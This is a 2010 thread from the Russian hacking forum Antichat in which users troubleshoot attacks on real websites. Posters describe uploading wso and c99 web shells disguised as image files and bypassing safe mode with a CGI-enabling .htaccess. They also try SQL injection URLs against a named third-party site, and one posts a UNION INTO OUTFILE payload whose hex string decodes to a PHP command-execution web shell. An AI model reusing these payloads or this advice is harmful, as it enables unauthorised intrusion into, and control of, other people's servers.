Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.05.2010, 20:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от DrakonHaSh
Konqi
каким образом на одном и том же сайте php-скрипты обладают разными правами ?
когда создают разные пользователи
+ sefa mode= On
Последний раз редактировалось Konqi; 17.05.2010 в 20:07..
|
|
|
17.05.2010, 20:08
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
Сообщение от Konqi
когда создают разные пользователи
извини, возможно я что-то не догоняю, но скорее ты похоже меня не понял:
* я залил шел через control/index.php - он имеет "право" создавать файлы в photo/
* я (в той же сессии, тем же браузером, и прочие бла бла) захожу через photo/158.php.jpg и тут уже нет прав на создание файлов в photo/
Последний раз редактировалось DrakonHaSh; 17.05.2010 в 20:12..
|
|
|
|
17.05.2010, 20:13
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от DrakonHaSh
извини, возможно я что-то не догоняю, но скорее ты похоже меня не понял:
* я залил шел через control/index.php - он имеет "право" создавать файлы в photo/
* я (в той же сессии, тем же браузером, и прочие бла бла) захожу через photo/158.php.jpg и тут уже нет прав на запись в photo/
если можно загрузи wso, посмотрим что тут творится,а то твой шелл просто ужас,глаза уже заболели =\
у меня тоже такое было,даже не мог посмотреть файлы на текущей директории
|
|
|
|
17.05.2010, 20:23
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
158.php.jpg это wso
|
|
|
|
17.05.2010, 20:24
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
DrakonHaSh, грузи другой шел который обходит Safe-mode
|
|
|
|
17.05.2010, 20:31
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
warlok посоветуй плиз какой конкретно, я пробовал c99madshell и wso2.4, другими не пользовался
[добавлено]
попробовал PPS 1.0 - Perl-cgi web shell by Pashkela, но отображается текстом.
залил такой .htaccess
Код:
Options +ExecCGI
AddHandler cgi-script cgi pl
проблема решена 
но если кто ответит на мои вопросы то тоже будет очень клева 
Последний раз редактировалось DrakonHaSh; 17.05.2010 в 21:00..
|
|
|
|
17.05.2010, 23:30
|
|
Участник форума
Регистрация: 03.08.2009
Сообщений: 103
Провел на форуме:
413428
Репутация:
13
|
|
Не могу составить правильный запрос, наверно дико туплю
http://www.macemates.net/news.asp?P=7+AND+1=2--
http://www.macemates.net/news.asp?P=7%27+AND+1=2--
http://www.macemates.net/news.asp?P=7%29+AND+1=2--
не прокатывают, как вы составляете правильное выражение ???
пожалуста пример если можно
|
|
|
|
17.05.2010, 23:40
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
не прокатит
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'Cint'
/news.asp, line 110
|
|
|
|
17.05.2010, 23:50
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Microsoft JET Database Engine error '80040e14'
значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
|
|
|
|
18.05.2010, 02:38
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
здрасте
Не Могу понять в чем проблема..
делаю такой запрос :
6+union+select+1+into+outfile+'1.php'+--+
на что получил ответ :
display_db_query: SELECT content from page where id = -6 union select 1 into outfile '1.php' -- File '1.php' already exists
ТОЕСТЬ я могу создавать файлы ?
потом делаю что то такое:
6+union+select+load_file(0x3C3F7061737374687275282 45F4745545B27636D64275D293B3F3E)+into+outfile+'1.p hp'+--+
на что получил ответ :
display_db_query: SELECT content from page where id = 6 union select load_file(0x3C3F706173737468727528245F4745545B2763 6D64275D293B3F3E) into outfile '1.php' -- File '1.php' already exists
и как мне теперь проверить что у меня получилось ?
где мне найти этот '1.php'
если кому не лень можна и попадробней в PM
спс за время.
Последний раз редактировалось Saiga; 18.05.2010 в 02:42..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
